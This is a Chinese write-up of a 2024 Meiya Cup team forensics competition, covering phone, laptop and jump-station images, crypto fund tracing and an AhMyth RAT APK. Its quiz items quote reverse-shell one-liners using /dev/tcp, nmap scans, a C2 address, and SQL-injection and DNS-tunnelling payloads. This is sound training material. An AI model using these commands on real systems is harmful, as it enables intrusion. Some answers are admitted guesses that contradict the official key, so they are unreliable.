2024年美亚杯团体赛wp

第十届美亚杯团体赛wp

容器密码:bWuDw#3qthnMpLz8+6>c!CHFmPKgB&?J5f:A4^a);d=*ysv7Rxn>fzT^BH8;JV#qSpF5C7kb4DsA$?a+9E6KZ3\xRwW=(jceu:NvvXD7r@&9YJz/nwbh<A:Pma4(K%3!

其实一直不太想复现团体赛，因为当时自己做的部分可能也就三分之一的样子，复现的难度太大了，题量太大了。但是想要突破，还得做。现在时隔半年回来做这些题，感觉都不算太难了。美亚杯的特色很明显，喜欢考翻数据库，题量大时间紧。其实团体赛的考点也比较新，有跳转站和VR仪器还有NAS重组。

稍微分析一下检材，我当时不太会服务器，其实现在也不太会，所以当时我主要分的是手机和计算机的镜像。团体赛也比较看重配合，每个人在自己擅长的方向上面才能打出最好的效果。

1.[填空题]在个人赛的最后一部分，你对David的数字设备进行了取证检查，发现他与一名成员Alice有可疑的沟通。你现在分析Alice的手机。参考Alice_Mobile.bin，Alice所使用的手机网络运营商公司的名称是什么？（答案格式: 请用大写英文字母作答 ，无须留空白） （1分）

LUCKYHK

2.[填空题]参考Alice_Mobile.bin，Alice 所使用的谷歌电子邮件地址是？（答案格式: 请用小写英文字母作答，例如:abc@google.com） （2分）

alicecutter94@gmail.com

3.[单选题]参考Alice_Mobile.bin，谁向Alice发送了一个含有个人资料的xlsx文件？（1分）

A. David

B. John

C. Ben

D. Amy

E. Harry

找到了这个文件，发现路径在whatsapp下面，那就去看看这个app

4.[填空题]承上题，参考Alice_Mobile.bin，该文件以MD5计算的哈希值是？（答案格式: 请用大写英文字母作答和用阿拉伯数字回答） （1分）

5457D5A68673B8D093D7666D515CCCB2

5.[单选题]参考Alice_Mobile.bin，Alice于Facebook（脸书）所建立的群组？（1分）

A. 大学生炒散搵工群

B. 最全面搵工推介

C. 全港笋工好工推介2024

D. 搵工全职兼职

E. 搵工WhatsApp群

6.[单选题]参考Alice_Mobile.bin，Alice在2024年8月15日于哪个地铁站和"客服人员"相约见面？（2分）

A. Chai Wan

B. Tai Koo

C. Wan Chai

D. Central

E. Mong Kok

7.[填空题]参考Alice_Mobile.bin，受骗女子欧凯被指示将虚拟货币转到哪个钱包地址？（答案格式: 大写英文字母， 小写英文字母及阿拉伯数字混合组成，例如: 0xDasdGJHI34twebGHJK2354YU34h） （2分）

0xdA9AE5b1bA2F404D0490dcd18a5C2247866FD148

8.[单选题]参考Alice_Mobile.bin，Alice指示"客服人员"使用什么交通工具离开香港？（1分）

A. 火车

B. 私家车

C. 飞机

D. 船

E. 货柜车

9.[填空题]参考Alice_Mobile.bin，客服人员"ZHANG WEI"的银行卡号是多少？（答案格式:用阿拉伯数字回答， 例如: 54613165456431） （2分）

6212345678987654321

10. [单选题]参考Alice_Mobile.bin，Alice总共在脸书（FACEBOOK）上发布了多少张照片？（2分）

A. 1

B. 3

C. 5

D. 7

E. 9

这个数据库挺奇怪的，没有被识别为数据库，进入这个里面，有九张图片，都指向了本地的路径，可以一张张看看，结合之前的聊天记录

比如这个2.jpg就是发布过的，其他的1234.jpg都是发布过的，另外几个在tmp目录下面的都不可见了，剩下两个fotor开头的应该不是，所以最终应该选5或者7。官方答案是5

11.[填空题]参考Alice_Mobile.bin，应用程序WhatsApp的数据库（database）内，哪个message_type代表发送的内容是表情包（Sticker）？

20

好像他们聊天不喜欢用表情包，找了好久表情包

12.[填空题]参考Alice_Mobile.bin，在Alice手机中，哪一个数据库（Database）记录了照片的数据？（答案格式：只需使用全部大写回答， 例如：ABC.DB） （2分）

EXTERNAL.DB

13.[填空题]承上题，参考Alice_Mobile.bin，该文件的最后修改日期和时间 （Last Modified Time） 是？（答案格式：YYYY-MM-DD HH:MM:SS） （2分）

2024-08-30 17:28:29

14.[单选题]从Alice的手机中发现，她一直与一名叫John的成员保持联系，你接着分析John的手机。参考John_Smartphone_itunebackup.zip，备份密码是「1234」，回答以下题目：在WhatsApp通讯软件内「三五成群」群组于什么时间创建？（2分）

A. 2024-08-29 17:44:38

B. 2024-07-25 15:22:09

C. 2024-07-30 12:45:50

D. 2024-07-30 16:15:34

15.[单选题]参考John_Smartphone_itunebackup.zip，照片IMG_007的创建日期时间是？（2分）

A. 2024年8月14日星期三下午02:54

B. 2024年9月02日星期三下午12:54

C. 2024年8月14日星期三下午12:54

D. 2024年8月16日星期五下午12:54

16.[单选题]参考John_Smartphone_itunebackup.zip，John曾使用什么通讯软件联系Ben？（2分）

A. Reddit

B. WhatsApp

C. WeChat

D. Line

17.[填空题]参考John_Smartphone_itunebackup.zip，于“三五成群”群中，电子表格文件"Personal_data.xlsx"是由哪一个电话号码发送到该群组的？（答案格式：只需要用阿拉伯数字回答，包含国际电话区号和电话号码，例如：85290001111） （2分）

85269711024

18.[单选题]他与一个叫Ben的人有可疑的沟通。你接着分析Ben的手机。参考BeniPhone.zip，根据Ben手机内通讯软件的记录，"This is a RAT APK that allows us to control Android devices remotely， enabling data access， monitoring and manipulation through an interface"是在什么时间接收或发出的？（1分）

A. 由Ben于2024-08-02 16:17:07接收

B. 由Ben于2024-08-05 15:53:37发出

C. 由Ben于2024-08-05 16:58:12接收

D. 由Ben于2024-08-05 17:22:47发出

19.[单选题]参考BeniPhone.zip，根据Ben手机内的照片记录，"IMG_0011.PNG"是通过哪种方式生成的？（2分）

A. 从互联网下载

B. 手机拍摄

C. 手机截图

D. 以上皆不是

需要备份密码，找不到，尝试爆破，比赛时候爆破出来是0000。或者直接翻文件也能找到

20.[单选题]你发现了该犯罪团伙似乎有一个共同的聊天群，其中包含有关可疑资本管理（与虚拟货币相关）的更多线索。参考该聊天群组对话分析，John，David及Alice筹集资金的目的是什么？（1分）

A. 建立一个网站给人投资虚拟货币

B. 建立一个网站用作行骗

C. 创建虚拟货币钱包用作洗黑钱

D. 写一个Android （APK）应用程序包，用作沟通

主要看这个三五成群的whatsapp群聊

21.[单选题]参考該聊天群对话、David，Emma與Clara的对话及IDFC的交易记录分析，哪一个虚拟货币地址储存John，David及Alice所筹集的IDFC？（3分）

A. 0xe90ad3f80e39e83b533eef3ed23c641ec51089c6

B. 0x04d079c7ace663bbe1d2c201072d63b036d16ccd

C. 0x10a4f01b80203591ccee76081a4489ae1cd1281c

D. 0x8155c0b8a0c95424f433d8ab6342086f0433e6c4

可以发现是David管理的虚拟钱包资金，其实可以和早上资格赛联系起来，他被盗取的虚拟币的钱包地址就是这道题的地址

我看了看别人的wp都是从上午的交易记录里面找到了，这条记录，然后说答案是B，感觉他们说的也挺对的，但是官方给的答案是C

22.[单选题]参考Alice_Mobile.bin，Alice总共使用了多少个虚拟货币地址直接接收受害人的IDFC？（2分）

A. 1

B. 3

C. 6

D. 7

这里找到9个，直接接收的是六个

23.[多选题]參考David_Laptop.e01内找到的IDFC交易记录，在收取受害人的IDFC后，它之后会再流向哪些虚拟货币地址？（2分）

A. 0xb2e3dbea311511ec5bda3e85e061f15366f888a6

B. 0x70544880875fe907cee383873ca58da23378caa5

C. 0x152c90200be61a540875f2a752c328bd19dbfb87

D. 0x59eb2c55eefdd4d8af2886c9fd8fc6f465c3e220

24.[单选题]承上题，上述IDFC去到那些地址后，谁掌管这些IDFC？（提示：分析IDFC的交易记录及个人赛所搜集的证据）（2分）

A. Alice（回復種子：pumpkin fold behind captain shoulder demand print hospital like smoke gate weird）

B. Ben（回復種子：wrap muscle rhythm stamp bundle zebra gorilla shuffle common tattoo ginger awake）

C. John（回復種子：abandon among anxiety pizza evidence face quiz ripple nerve pact nasty unveil）

D. David（回復種子：stock avocado grab clay light sadness segment ancient toe talk elder oil）

结合个人赛David钱包被盗，就能选出来了

25.[单选题]2024年9月，Tom Victor带同其秘书Amy来到警署报案，称其秘书被骗子用人工智能视频在2024年8月29日早上骗去10，000，000 IDFC，清找出该交易的交易哈希（ransaction Hash）？（2分）

A.0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a483dd92d

B.0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792a

C.0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792d

D.0x04dcfbb681e125076c7f3c79ddee7e2b4859881ad031e90cf7fc251a4835792c

就是这条交易记录，这里是UTC时间，所以应该是11点多

26.[多选题]就現時搜集到的證據、David Laptop 64GB.e01内的资料及IDFC的资金流分析，下列哪些虚擬货币地址是最終诈骗集团儲存犯罪所得的地址？（3分）

A. 0x63a8ba1df0404ee41f7c6af8efd2f54006f32042

B. 0xe90ad3f80e39e83b533eef3ed23c641ec51089c6

C. 0x10a4f01b80203591ccee76081a4489ae1cd1281c

D. 0x90f73497e4446f6cf9881213c32d6af66d799fe5

前面的地址是上面三个地址最终流入的地址，后面的地址是Tom Victor被诈骗后流入的地址

27.[单选题]你现在査看Ben的笔记本电脑，并发现了APK文件。一般而言，APK的关键组成部分是什么？（3分）

A.AndroidManifest.xml， classes.dex， resources.arsc， res/

B. AndroidManifest.xml， META-INF/， res/， assets/

C.classes.dex， lib/， AndroidManifest.xml， META-INF/

D.res/， assets/， AndroidManifest.xml， classes.dex

理论题，问问ai就行

28.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，这个APK没有classes.dex文件，而是有smali文件，以下哪一个陈述是正确的？（3分）

A. 这是一个經過反向工程製作的APK

B. 该APK已损坏

C. 文件结构不完整

D. APK包含加密代码

dex文件反编译能得到smail文件

29.[单选题]参考Ben_Laptop.zip内的Joshe lnvestment.apk，Ben使用了哪个工具包生成恶意APK以控制受害者的设备？（1分）

A. Metasploit

B. SpyNote

C. QuasarRAT

D. AhMyth

刚想查看，发现就报毒了

30.[单选题]参考Ben_Laptop.zip内的Joshe lnvestment.apk，确认哪个.xml文件被特别添加为主活动（activity_main）的布局文件？（3分）

A. activity_main.xml

B. main_activity.xml

C. main.xml

D. Thisismain.xml

31.[单选题]参考Ben_Laptop.zip内的Joshe lnvestment.apk，确认被指定为主活动层（activity main layer）.xml文件的公共ID？（3分）

A.0x7f040000

B.0x7f050000

C.0x7f060000

D.0x7f070000

32.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，确认应用程序没有要求的权限？（3分）

A. android.permission.READ_CONTACTS

B. android.permission.USE_FINGERPRINT

C. android.permission.WRITE_CALENDAR

D. android.permission.ACCESS_FINE_LOCATION

好像bc都找不到

33.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，ahmyth/mine/king/ahmyth/文件夹下的b.smali文件的主要功能是什么？（3分）

A. 管理网络连接

B. 处理相机操作并捕捉图像

C. 管理应用程序设置

D. 处理数据库操作

一进来就是什么camera和image什么的

34.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，在ahmyth/mine/king/ahmyth/文件夹下的b.smali文件中，字节数组（Byte Array）在发送到服务器之前执行了哪一系列操作，最终的图像格式是？（3分）

A. 字节数组被译码、加密、转换为PNG格式，并发送到服务器

B. 字节数组被译码、压缩成JPEG格式，并封装到JSONObiect中再发送到服务器

C. 字节数组被编码为String，压缩成BMP格式，转换为字节数组并发送

D. 字节数组被编码为String，压缩成JPEG格式，转换为字节数组并发送

35.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，在 ahmyth/mine/king/ahmyth/文件夹下的b.smali文件中，图像在发送到服务器時的压缩比率是多少？（6分）

A.50%

B.30%

C.20%

D.10%

猜测是这个20

36.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，在ahmyth/mine/king/ahmyth/文件夹下的ConnectionManager.smali中，sendReq method的目的是什么？（6分）

A. C2服务器向受感染的设备发送请求

B. 处理用户接口的更新

C. 建立到C2服务器的网络连接

D. 管理应用程序设置

通过ping命令维持与服务器之间的连接

37.[单选题]承上题，参考Ben Laptop.zip内的Joshe Investment.apk，C2服务器的IP地址及端口号？（6分）

A. IP:192.168.1.1:8080

B. IP:10.0.0.1:80

C. IP:172.16.0.1:443

D. IP:59.152.211.11:4444

跳转e类，发现里面有base64

38.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，ahmyth/mine/king/ahmyth/文件夹下的g.smali文件中，MediaRecorder被初始化用于录音。如果setAudioSource()方法使用了错误的参数，会发生什么，且这将如何影响录音过程的功能？（6分）

A. 应用将以默认设置继续录音，但音质可能会降低

B. MediaRecorder会抛出IllegalStateException，并阻止录音的开始

C. 录音将继续，但文件格式将与指走的输出格式不兼容

D. 应用只会在调用start()方法后由于无效的音频编码而崩溃

输入的参数不对，会执行最后面的log，中止录音

39.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，ahmyth/mine/king/ahmyth/文件夹下的g.smali文件中，TimerTask用于在启动MediaRecorder后调度动作。TimerTask在这个过程中有什么作用？（6分）

A. 它以设定的间隔暂停录音，以更好地管理资源

B. 它通过在设定的间隔调整录音参数来提高音质

C. 它定期压缩录制的音讯文件以节省存储空间

D. 它监控录音时长，并根据录音时间安排事件

有点难，java不太懂，ai说大概在这里

40.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，在ahmyth/mine/king/ahmyth/文件夹下的h.smali文件中，method a()和method b()的主要功能有什么区别？（6分）

A. Method a()是检索存储在设备上的联系人清单并将其格式化为JSONArray，而method b()是从被入侵的设备向联系人发送消息

B. Method a()是收集收件箱中的所有SMS短信，而method b()是利用被入侵的设备发送SMS短信

C. Method a()是向指定的电话号码发送包含自定义消息内容的SMS短信，method b()是接收发送确认

D. Method a()是从设备中检索MMS短信，而method b()是使用被入侵的设备发送MMS短信

a方法就是读取所有的sms短信，下面这个address应该是电话号码，body是短信的正文，然后转化为json格式。方法b就是发送短信到目标号码

41.[单选题]参考Ben_Laptop.zip内的Joshe Investment.apk，在ahmyth/mine/king/ahmyth/文件夹下的h.smali文件中，method b()需要哪些参数？（6分）

A. method b()请求两个字符串参数，联系人姓名和联系人号码

B. method b()请求一个文件路径的字符串参数和一个数据内容的字符串参数

C. method b()请求一个URL的字符串参数和一个负载数据的字符串参数

D. method b()请求两个字符串参数，接收者的电话号码和消息内容

问问ai就行了

42.[单选题]在分析Ben的笔记本电脑时，你从调查人员那里获得了以下信息：在对一名被捕的犯罪集团成员进行审问时获得的情报显示，Ben对John心怀怨恨，因为John扣留了Ben的犯罪收益份额。因此，Ben加密了John的机密文件夹，以限制他的访问。参考Ben_Laptop.zip，解密secretExcel.encrypted的第一步应该是什么？（2分）

A. 生成新的随机密钥

B. 打开加密文件并读取文件的前16个字节

C. 压缩加密档

D. 删除加密档

在加密文件的同目录下面找到了加密的脚本。

注意到将加密过程中的iv值和盐值写到了文件开始，然后才将加密的数据写入，所以解密的顺序是先读取前面的iv值和盐值，将密文和它们分开，进行解密

43.[单选题]参考Ben_Laptop.zip，在加密文件secretExcel.encrypted中，初始向量 （lnitial Vector）的值是什么？（2分）

A. 64f4e21c1e4cc3a60137da79e75bf973

B. a6b7e84f91827c3d2a94bfed7b5ca9d1

C. 3b29d2a46aab93bba07c6893d1b8e93a

D. 7f8d9b2a14c5aef3786d12c4b6e2d4f9

直接看文件头的前16个字节

44.[单选题]参考Ben_Laptop.zip，在加密文件secretExcel.encrypted中，盐值（SALT）是什么？（2分）

A.5d5ca840accf95169288de5bf85dacd7bb05ad888afac26efd05cc436c4a5424

B.a3d9f0e4b7c8d5a9c2e7f0b3a5d7c6b1b8e7a2f9c3d1e4f5a6b9c0d7e1f2b4c8

C.f2e1d0c9b8a7f6e5d4c3b2a1e8f7d6c5b4a3d2f1e0c9b8a7d6e5c4b3a2f1e0d9

D.c7b6a5d4e3f2d1c0e9d8b7a6f5e4d3c2b1a0e9f8d7c6b5a4b3c2d1e0f9e8d7c6

45.[单选题]参考Ben_Laptop.zip，查看’encrypt.py’代码，如果更改’PBKDF2’的’count’参数会产生什么影响？（2分）

A. 仅影响解密时所需的计算性能

B. 仅影响加密的安全性

C. 同时影响所需的计算性能和安全性

D. 没有影响

相当于是改了加密轮数，就是更安全，但是需要计算的量更大了

46.[单选题]参考Ben_Laptop.zip，根据分析及计算后，解密secrectExcel.encrypted所用的key具体值是什么？（3分）

A:b’\xb2T\xc2\xb9\xb7wf9\x95Y\xcc)\xec\xff\x0e\xb6\xf6\x03\x92z\xc6\xe4\x11P\x07@\x94\xbcl\xfd\x95\xc5’

B:b’/T_\r\x1e\xb8\xe6_\xcd\x01\x95\xde\xb8\r\xb3\xb6\nVp\xeb\xf1S\xb4m\xd6wH\xc4\xc8\xcf\xed’

C:b’\xea\x15\xf9\x05\x85\xe8h\x87\xc4\xf0O\x8a\xba1\x96\x05b\xf9\xa3g\xbaMm\xa4\t,\xe0Q\x87\x8e\xfb\x8c’

D:b’q!\xae2\x1fvo\xb6]\xfb\x1f\x8c\xe5\x18\x03\x0b\xcc\xc93\xf7/us\x8a\x1e;\xd2\xe3\x81\x05\xaa\x04’

用同目录下面的password.txt和读取的盐值生成key，发现能对上D选项

import os
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Util.Padding import unpad

def decrypt_file(file_path, password):
    # 打开加密文件并读取前16个字节（IV）和后续的32个字节（salt）
    with open(file_path, 'rb') as f_in:
        iv = f_in.read(16)  # IV
        salt = f_in.read(32)  # Salt

        # 使用 PBKDF2 生成密钥
        key = PBKDF2(password, salt, dkLen=32, count=100000000)
        
        # 输出密钥（调试用途）
        print(f"Generated Key: {key.hex()}")  # 将密钥转换为十六进制字符串输出

        # 创建AES解密对象
        cipher = AES.new(key, AES.MODE_CBC, iv=iv)

        # 读取加密的数据
        encrypted_data = f_in.read()

        # 解密数据
        decrypted_data = unpad(cipher.decrypt(encrypted_data), AES.block_size)

    print(f"File decrypted successfully: {file_path}")
    return decrypted_data

if __name__ == "__main__":
    # 获取当前脚本所在的目录
    current_dir = os.path.dirname(os.path.abspath(__file__))

    # 构建文件路径
    password_file = os.path.join(current_dir, "password.txt")
    encrypted_file = os.path.join(current_dir, "secretExcel.encrypted")

    # 检查文件是否存在
    if not os.path.exists(password_file):
        print(f"Error: Password file '{password_file}' not found.")
        sys.exit(1)
    if not os.path.exists(encrypted_file):
        print(f"Error: Encrypted file '{encrypted_file}' not found.")
        sys.exit(1)

    # 读取密码
    with open(password_file, 'r', encoding='utf-8') as f:
        password = f.read().strip()  # 去除可能存在的换行符或空格

    # 解密文件
    try:
        decrypted_data = decrypt_file(encrypted_file, password.encode('utf-8'))
        
        # 将解密后的内容保存到新文件中（可选）
        output_file = os.path.join(current_dir, "decrypted_output.txt")
        with open(output_file, 'wb') as f_out:
            f_out.write(decrypted_data)
        print(f"Decrypted data saved to: {output_file}")
    except Exception as e:
        print(f"Error during decryption: {e}")

47.[单选题]参考Ben_Laptop.zip，解密后的Excel文件中，程琳的电话号码是什么？（3分）

A. +852 106523728123

B. +852 180300901529

C. +60 243428690343

D. +63 060940949159

解密后是excel表，改一下后缀

48.[填空题]参考Ben Laptop.zip，解密后的Excel文件中，周亮的ID/Passport Number是什么？（提示：只需使用阿拉伯数字回答）（3分）

510800196504216464

49.[单选题]根据可能难以破解的加密，你意识到Ben对黑客技术有深入的了解，请回答以下问题，以便了解Ben的运作。Ben想要有效地搜索信息，他可以使用以下哪个Gogle高级搜索运算符来搜索某个特定网站？（2分）

A. [related:]

B. [inurl:]

C. [site:]

D. [info:]

常识题，不会就问问ai

50.[单选题]参考材料1.pdf，Ben试图入侵一个系统，他尝试在系统中打开HTTP服务器，使用Python内置的http.server模块启动基本HTTP服务器的命令是什么，以便攻击者从目标机器下载文件？（1分）

A. python3 -m http.server 9000

B. python3 -a http.server 9000

C. python3 -r http.server 9000

D. python3 -m http.server 8000

打开pdf，发现端口号是9000，然后问了ai，说没有-a和-r这两个参数

51.[单选题]参考材料2.pdf，Ben准备了几个用于黑客攻击的脚本，这段代码的攻击目的是什么？（4分）

A. 拒绝服务

B. 缓冲区溢出

C. 建立反向 shell

D. 勒索软件

一眼pwn题，直接秒

52.[单选题]Ben准备了几个用于黑客攻击的脚本，参考材料3.pdf，他采用了什么技术来保护代码？（2分）

A. 加密

B.代码混淆

C. 隐写术

D. 编译

不太懂web，但是明显看出来这有混淆

53.[单选题]参考材料4.pdf，他利用了什么方法来获取反弹shell（Reverse shel）？（2分）

A.中间人攻击

B.暴力破解

C.缓冲区溢出

D.文件上传

看里面在uploads目录下面，说明是文件上传

54.[单选题]参考1.pcap，Ben使用了哪些命令来扫描目标机器（提示：Ubuntu）？

i） arp-scan -l

ii） nmap -p1-65535 -sV-sC -O

iii） nmap -Sx

iv） nmap -Ss （4分）

A. i&ii

B. ii&iii

C. i&iv

D.以上皆是

i就是用了arp扫目前所有的网络，然后这下面流量包里目标都是广播地址

好像是说iii和iv是一个意思，ii应该是有的，扫了很多端口。iii和iv的特征我也看不懂，看川佬博客说根据端口判断，是因为端口太多了，所以不符合后面两个吗？

ii) nmap -p1-65535 -sV -sC -O
特征：
全端口扫描（-p1-65535）
扫描目标所有 TCP 端口（1-65535），覆盖范围广但耗时较长。
服务/版本检测（-sV）
探测开放端口运行的服务及其版本（如 MySQL 8.0.33）。
脚本扫描（-sC）
执行 Nmap 脚本引擎（NSE）的默认脚本，检测漏洞、配置问题等。
操作系统检测（-O）
通过 TCP/IP 指纹技术推断目标操作系统（如 Windows 11 或 Linux Ubuntu）。
适用场景：
深度渗透测试或安全评估。
需要全面了解目标网络资产时。
iii) nmap -Sx
特征：
TCP SYN 扫描（-Sx 是 -sS 的旧别名）
发送 SYN 包探测端口，若收到 SYN-ACK 表示端口开放，最后发送 RST 结束会话。
隐蔽性：不完成 TCP 三次握手，日志记录较少。
权限要求：通常需要 root 权限（需发送原始数据包）。
适用场景：
快速探测目标端口状态，避免被防火墙或入侵检测系统（IDS）拦截。
扫描需绕过简单包过滤的场景。
iv) nmap -Ss
特征：
TCP SYN 扫描（-Ss 是 -sS 的另一种写法）
与 -Sx 完全等效，属于同一种扫描技术。
特征同上：隐蔽性高、需 root 权限、半开放扫描。

55.[单选题]参考2.pcap，第56号数据包的代码功能是什么？（4分）

A. 清除记录

B.拒绝服务

C.测试注入漏洞

D.反向外殼 （Reverse Shell）

看到是反弹shell

56.[填空题]参考1.pcap，当Ben成功进入目标系统时，攻击者获取的账户？（答案格式：请使用小写英文字母作答）（4分）

root

反弹shell后会通过whoami来看目前的权限，所以直接过滤这个tcp contains "whoami"

57.[单选题]Ben正在尝试入侵一个系统，并且他正在进行开源研究，他发现nc -lvp 9000将被用来连接到反弹shell（Reverse Shell），Ben将使用什么命令来创建反弹shell （Reverse Shell）？

i）0<&196;exec 196<>/dev/tcp/10.10.10.10/9000;sh <&196 >&196 2>&196

ii）exec 5<>/dev/tcp/10.10.10.10/9000;cat <&5 | while read line; do $line 2>&5 >&5; done

iii）/bin/bash -i >& /dev/tcp/192.168.217.139/4444 0>&1

iv）sh -i 5<> /dev/tcp/10.10.10.10/9000 0<&5 1>&5 2>&5 （4分）

A. i

B. ii

C. iii

D. iv

参考第55题的反弹shell命令

58.[填空题]参考材料5.pdf，Ben输入了“find / -perm -4000 2>/dev/null”后，显示了材料5.pdf的內容，這些內容所显示的内容除具有执行权限，还设置了什么？（答案格式：请以大写英文字母作答输入答案） （4分）

SUID

59.[单选题]Ben发现了下面的命令import pty; pty.spawn(“/bin/bash”)，它的功能是？（4分）

A. 在shell中导入Python函数

B. 允许shell执行Python命令

C. 获取比www-data用户更高权限的交互式shell

D. 以上皆不是

/bin/bash是pwn里面有用到的获取shell的方式好像。

60.[填空题]你注意到Ben的笔记本电脑上安装了暗网Tor，请回答以下问题。Ben应该输入什么命令来在Kali linux中执行Tor浏览器？（答案格式：小写英文字母和符号’-'混合作答，例如：abc-def （4分）

torbrowser-launcher

在历史命令里面

61.[单选题]参考Ben_Laptop.zip，Ben经常使用Tor浏览器，该Tor浏览器把多少个.onion链接添加为书签？（2分）

A. 1

B. 2

C. 3

D. 4

过滤之后发现有10个，其中有六个创建时间相同，要猜也是猜4种。然后看了别人的wp说这里六个是系统创建的书签，剩下4个是自己创建的

62.[单选题]在检査Ben的记录时，发现了Port 9151的连接，那是指Ben在使用什么浏览器？（2分）

A. Chrome

B. Tor

C. Duckduckgo

D. Edge

先查看网络连接，根据进程的PID得到使用的浏览器

*63.[判断题]参考材料6.pdf，应该保持默认设置，以便Firefox浏览器使用Tor网络？（2分）

错

不太明白为什么，看这个wp感觉讲的挺对的，但是答案不对。https://mp.weixin.qq.com/s/ItUo_QqNYx41dECTb_2kDg

64.[单选题]参考Ben_Laptop.zip，Ben使用OpenVPN 5.196.64.231多少天？（答案格式：只需使用阿拉伯数字回答）（2分）

A. 1

B. 2

C. 3

D. 4

在ben的桌面上面有一个OpenVPN.log

65.[填空题]参考Ben_Laptop.zip，他使用了哪种算法加密密码？（答案格式：大写英文字母和符号’-'混合组成）（2分）

AES-256-GCM**

还能看到AES-256-CBC的算法，但是主要看连接时的密码吧。

66.[单选题]在2024年8月16日17:40:06，发生了什么？

i）无法在奏接字（socket）上执行操作

**ii）系统缺乏足够的缓冲区空间 **

iii）队列（queue）已满。

（提示：1）套接字是用于网络通信的编程接口，允许程序在网络上发送和接收数据，2）队列已满是程序试图将更多的元素插入到一个已经达到容量上限的队列中）（2分）

A. i&ii

B. ii & iii

C.i&ii

D.以上皆是

根据时间找到对应的日志

好像看一下英文就能选出来答案，首先是无法执行socket操作，因为缺乏缓冲区空间或者队列已满

67.[单选题]调查员把一只属于Ben的U盘和一张SD卡交给了你进行分析。参考Ben_USB.e01，是什么导致了“满汉全席.jpg”和“满汉全席Secret.jpg”之间的大小差异？（2分）

A. 档案嵌入其中

B. 像素差异

C. MAC 时间更改

D. 错误的档扩展名

可以发现两张图片一模一样，但是大小不一样，用010看看，发现后面藏了一个zip压缩包，用binwalk提出来，后面发现不对，是一个word文档

68.[填空题]参考BenSDCard.e01，Ben的SD卡的解密密码是？（2分）

IamRich123!

应该是上一题word的末尾的密码

69.[填空题]参考Ben_Laptop.zip，在2024/08/23 14:54:59 UTC+8，Ben浏览了哪个网站？（答案格式：“https://xxxxxx.com/”）（1分）

https://teamviewer_internal/

看了别人的博客，说是可以用火眼的时间线功能，确实还挺好用的!

*70.[填空题]参考Ben_Laptop.zip，Ben浏览上一题所述的网站时连接到他的计算机的Wi-Fi MAC地址是？（答案格式：“A1:B2:C3:D4:E5:F6”）（1分）

90:61:AE:C0:90:C2

当时连的wifi应该就是这个Starbucks，理论就是这个mac地址，但是和答案不一样

71.[单选题]参考Ben_laptop.zip和Ben_Jumpstation.zip，回答以下问题：Ben的计算机使用下列哪款远程桌面软件访问了Ben的跳转站（Jumpstation）？

i：向日葵远程控制

ii：AnyDesk

iii：TeamiViewer （2分）

A. i&ii

B. ii&iii

C. 只有iii

D. 只有ii

远程连接有ben的记录，但是和ben电脑上面远程连接的记录对不上，而且登录账户也对不上

TeamViewer有记录

72.[填空题]参考Ben_Jumpstation.zip，Ben的跳转站 （Jumpstation）IP地址和子网掩码（Subnet mask）是什么？（答案格式：192.168.1.1/28）（1分）

192.168.182.128/24

做这道题感觉需要一点计网的知识

73.[填空题]参考Ben_Jumpstation.zip，在Ben的跳转站（Jumpstation）上，该远程桌面软件中的访问ID是什么？（答案格式：请用阿拉伯数字作答）（2分）

687062512

74.[填空题]参考Ben_Jumpstation.zip，Alice何时从跳转站（Jumpstation）下载了文件？（请以UTC+8回答）（答案格式：YYYY-MM-DD HH:MM:SS）（2分）

2024-08-23 17:31:55

在这个目录下面存在日志文件 Jump Station.vmdk/分区6/Program Files/TeamViewer/TeamViewer15_Logfile.log

题目给了提示要UTF+8，所以时间应该是加15个小时

75.[单选题]参考Ben Jumpstation.zip，有多少个访问ID连接过跳转站 （Jumpstation）？（2分）

A.1

B. 2

C. 5

D. 6

76.[单选题]您正在检查来自Web应用程序防火墙的HTTP流量日志，并注意到以下日志条目：

[2023-10-15 11:45:12] “GET /search?q=%27%3B+SHUTDOWN±- HTTP/1.1” 500

[2023-10-15 11:45:15] “GET /search?q=%27+UNION+SELECT+password+FROM+users±- HTTP/1.1” 200

[2023-10-15 11:45:18] “GET /search?q=%27+OR+1%3D1±- HTTP/1.1” 200

根据这些日志条目，下列哪项陈述正确识别了攻击的类型和目标组件？

i. 正在尝试SQL注入攻击｡

ii. 攻击者瞄准的是Web应用程序的数据库｡

iii. 正在执行跨站点脚本（XSS）攻击｡

iv. 正在瞄准Web服务器的操作系统｡ (2分)

A. i&ii

B. ii&iii

C. i&iv

D. iii&iv

直接交给web手或者ai

77. [单选题]在对网络日志进行取证分析时，您发现内部主机向可疑網域发出了不寻常的DNS查询

Timestamp:2024-09-23 12:00:00 Query:dGhpc3Bj.susdomain.com Type:TXT Timestamp:2024-09-23 12:05:00 Query:cGFzc3dvcmRpcw==.susdomain.com Type:TXT Timestamp:2024-09-23 12:10:00 Query:TWVpeWEyMDI0.susdomain.com Type:TXT

结果顯示包含大量base64编码数据，攻击者使用了什么技术？（2分）

A. 域生成算法（DGA）用于C2通信

B. 快速通量DNS用于隐藏恶意服务器

C. DNS缓存投毒用于复位向流量

D. DNS隧道用于数据泄露

问问ai

78.[单选题]在检查内部客户端和外部服务器之间的捕获包，您注意到以下Transport Layer Security（TLS）握手消息：

Client Hello：Supported Versions：TLS 1.0，TLS 1.1，TLS 1.2 Cipher Suites：TLS_RSA_WITH_3DES_EDE_CBC_SHA, TLS_RSA_WITH_RC4_128_SHA Server Hello：Selected Version：TLS 1.0 Cipher Suite:TLS_RSA_WITH_RC4_128_SHA

鉴于客户端和服务器都支持更高版本的TLS和更强的加密套件，下列哪些是降级的合理解释？

i. 中间人攻击导致协议降级。

ii. 错误配置导致回退到较弱的加密方式。

iii. 由于客户端与服务器的兼容性问题，属于正常操作。（2分）

A. i&ii

B. 只有ii

C. 只有i

D. 以上皆是

79.[单选题]參考以下HTTP访问日誌片段：

